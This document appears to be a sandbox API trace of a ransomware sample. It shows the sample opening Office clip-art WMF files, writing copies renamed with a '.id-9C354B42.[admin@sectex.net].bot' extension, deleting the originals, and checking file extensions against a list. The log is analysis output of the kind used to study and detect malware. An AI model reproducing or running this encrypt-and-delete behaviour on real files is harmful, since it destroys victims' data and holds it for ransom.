	[0141.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0141.683] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.684] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0141.684] GetLastError () returned 0x0
	[0141.684] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xa54, lpOverlapped=0x0) returned 1
	[0141.689] WriteFile (in: hFile=0x3b8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xa60, lpOverlapped=0x0) returned 1
	[0141.690] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.690] WriteFile (in: hFile=0x3b8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.690] SetEndOfFile (hFile=0x3b8) returned 1
	[0141.691] CloseHandle (hObject=0x3b8) returned 1
	[0141.691] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.691] SetEndOfFile (hFile=0x31c) returned 1
	[0141.694] CloseHandle (hObject=0x31c) returned 1
	[0141.694] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.694] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf")) returned 1
	[0141.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63
	[0141.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63
	[0141.695] lstrlenW (lpString=".doc") returned 4
	[0141.695] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.695] lstrlenW (lpString=".docx") returned 5
	[0141.695] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.695] lstrlenW (lpString=".pdf") returned 4
	[0141.695] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.695] lstrlenW (lpString=".xls") returned 4
	[0141.695] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.695] lstrlenW (lpString=".xlsx") returned 5
	[0141.695] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.695] lstrlenW (lpString=".ppt") returned 4
	[0141.695] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63
	[0141.695] lstrlenW (lpString=".zip") returned 4
	[0141.695] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.695] lstrlenW (lpString=".rar") returned 4
	[0141.695] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.695] lstrlenW (lpString=".bz2") returned 4
	[0141.695] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.695] lstrlenW (lpString=".7z") returned 3
	[0141.695] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63
	[0141.695] lstrlenW (lpString=".dbf") returned 4
	[0141.695] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63
	[0141.695] lstrlenW (lpString=".1cd") returned 4
	[0141.695] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63
	[0141.696] lstrlenW (lpString=".jpg") returned 4
	[0141.696] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63
	[0141.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63
	[0141.696] lstrlenW (lpString=".doc") returned 4
	[0141.696] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.696] lstrlenW (lpString=".docx") returned 5
	[0141.696] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.696] lstrlenW (lpString=".pdf") returned 4
	[0141.696] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.696] lstrlenW (lpString=".xls") returned 4
	[0141.696] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.696] lstrlenW (lpString=".xlsx") returned 5
	[0141.696] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.696] lstrlenW (lpString=".ppt") returned 4
	[0141.696] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63
	[0141.696] lstrlenW (lpString=".zip") returned 4
	[0141.696] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.696] lstrlenW (lpString=".rar") returned 4
	[0141.696] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.696] lstrlenW (lpString=".bz2") returned 4
	[0141.696] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.696] lstrlenW (lpString=".7z") returned 3
	[0141.696] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63
	[0141.696] lstrlenW (lpString=".dbf") returned 4
	[0141.696] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63
	[0141.696] lstrlenW (lpString=".1cd") returned 4
	[0141.696] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63
	[0141.696] lstrlenW (lpString=".jpg") returned 4
	[0141.697] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.697] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.697] lstrlenW (lpString="BL00269_.WMF") returned 12
	[0141.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0141.697] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=5272) returned 1
	[0141.697] CloseHandle (hObject=0x31c) returned 1
	[0141.697] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf")) returned 0x20
	[0141.697] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0141.698] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.698] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0141.698] GetLastError () returned 0x0
	[0141.698] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1498, lpOverlapped=0x0) returned 1
	[0141.855] WriteFile (in: hFile=0x3b8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x14a0, lpOverlapped=0x0) returned 1
	[0141.856] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.856] WriteFile (in: hFile=0x3b8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.856] SetEndOfFile (hFile=0x3b8) returned 1
	[0142.093] CloseHandle (hObject=0x3b8) returned 1
	[0142.093] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.093] SetEndOfFile (hFile=0x31c) returned 1
	[0142.481] CloseHandle (hObject=0x31c) returned 1
	[0142.481] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.507] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf")) returned 1
	[0142.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63
	[0142.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63
	[0142.533] lstrlenW (lpString=".doc") returned 4
	[0142.533] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.533] lstrlenW (lpString=".docx") returned 5
	[0142.533] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.533] lstrlenW (lpString=".pdf") returned 4
	[0142.533] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.533] lstrlenW (lpString=".xls") returned 4
	[0142.533] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.533] lstrlenW (lpString=".xlsx") returned 5
	[0142.533] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.533] lstrlenW (lpString=".ppt") returned 4
	[0142.533] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63
	[0142.533] lstrlenW (lpString=".zip") returned 4
	[0142.533] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.533] lstrlenW (lpString=".rar") returned 4
	[0142.533] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.533] lstrlenW (lpString=".bz2") returned 4
	[0142.533] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.533] lstrlenW (lpString=".7z") returned 3
	[0142.533] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63
	[0142.533] lstrlenW (lpString=".dbf") returned 4
	[0142.533] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63
	[0142.533] lstrlenW (lpString=".1cd") returned 4
	[0142.533] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63
	[0142.533] lstrlenW (lpString=".jpg") returned 4
	[0142.534] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63
	[0142.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63
	[0142.534] lstrlenW (lpString=".doc") returned 4
	[0142.534] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.534] lstrlenW (lpString=".docx") returned 5
	[0142.534] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.534] lstrlenW (lpString=".pdf") returned 4
	[0142.534] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.534] lstrlenW (lpString=".xls") returned 4
	[0142.534] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.534] lstrlenW (lpString=".xlsx") returned 5
	[0142.534] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.534] lstrlenW (lpString=".ppt") returned 4
	[0142.534] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63
	[0142.534] lstrlenW (lpString=".zip") returned 4
	[0142.534] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.534] lstrlenW (lpString=".rar") returned 4
	[0142.534] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.534] lstrlenW (lpString=".bz2") returned 4
	[0142.534] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.534] lstrlenW (lpString=".7z") returned 3
	[0142.534] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63
	[0142.534] lstrlenW (lpString=".dbf") returned 4
	[0142.534] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63
	[0142.534] lstrlenW (lpString=".1cd") returned 4
	[0142.534] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63
	[0142.534] lstrlenW (lpString=".jpg") returned 4
	[0142.535] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.535] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.535] lstrlenW (lpString="BL00525_.WMF") returned 12
	[0142.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0142.556] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=9590) returned 1
	[0142.556] CloseHandle (hObject=0x3cc) returned 1
	[0142.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf")) returned 0x20
	[0142.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0142.556] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.556] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0142.557] GetLastError () returned 0x0
	[0142.557] ReadFile (in: hFile=0x3cc, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x2576, lpOverlapped=0x0) returned 1
	[0142.575] WriteFile (in: hFile=0x3a0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x2580, lpOverlapped=0x0) returned 1
	[0142.577] ReadFile (in: hFile=0x3cc, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.577] WriteFile (in: hFile=0x3a0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.577] SetEndOfFile (hFile=0x3a0) returned 1
	[0142.577] CloseHandle (hObject=0x3a0) returned 1
	[0142.577] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.577] SetEndOfFile (hFile=0x3cc) returned 1
	[0142.579] CloseHandle (hObject=0x3cc) returned 1
	[0142.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.580] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf")) returned 1
	[0142.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63
	[0142.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63
	[0142.580] lstrlenW (lpString=".doc") returned 4
	[0142.580] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.580] lstrlenW (lpString=".docx") returned 5
	[0142.580] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.580] lstrlenW (lpString=".pdf") returned 4
	[0142.580] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.580] lstrlenW (lpString=".xls") returned 4
	[0142.580] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.580] lstrlenW (lpString=".xlsx") returned 5
	[0142.580] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.580] lstrlenW (lpString=".ppt") returned 4
	[0142.580] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63
	[0142.581] lstrlenW (lpString=".zip") returned 4
	[0142.581] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.581] lstrlenW (lpString=".rar") returned 4
	[0142.581] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.581] lstrlenW (lpString=".bz2") returned 4
	[0142.581] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.581] lstrlenW (lpString=".7z") returned 3
	[0142.581] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63
	[0142.581] lstrlenW (lpString=".dbf") returned 4
	[0142.581] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63
	[0142.581] lstrlenW (lpString=".1cd") returned 4
	[0142.581] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63
	[0142.581] lstrlenW (lpString=".jpg") returned 4
	[0142.581] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63
	[0142.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63
	[0142.581] lstrlenW (lpString=".doc") returned 4
	[0142.581] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.581] lstrlenW (lpString=".docx") returned 5
	[0142.581] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.581] lstrlenW (lpString=".pdf") returned 4
	[0142.581] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.581] lstrlenW (lpString=".xls") returned 4
	[0142.581] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.581] lstrlenW (lpString=".xlsx") returned 5
	[0142.581] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.581] lstrlenW (lpString=".ppt") returned 4
	[0142.581] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63
	[0142.581] lstrlenW (lpString=".zip") returned 4
	[0142.582] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.582] lstrlenW (lpString=".rar") returned 4
	[0142.582] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.582] lstrlenW (lpString=".bz2") returned 4
	[0142.582] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.582] lstrlenW (lpString=".7z") returned 3
	[0142.582] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63
	[0142.582] lstrlenW (lpString=".dbf") returned 4
	[0142.582] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63
	[0142.582] lstrlenW (lpString=".1cd") returned 4
	[0142.582] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63
	[0142.582] lstrlenW (lpString=".jpg") returned 4
	[0142.582] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.582] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.582] lstrlenW (lpString="BL00923_.WMF") returned 12
	[0142.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0142.600] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=6256) returned 1
	[0142.600] CloseHandle (hObject=0x3b8) returned 1
	[0142.600] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf")) returned 0x20
	[0142.626] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
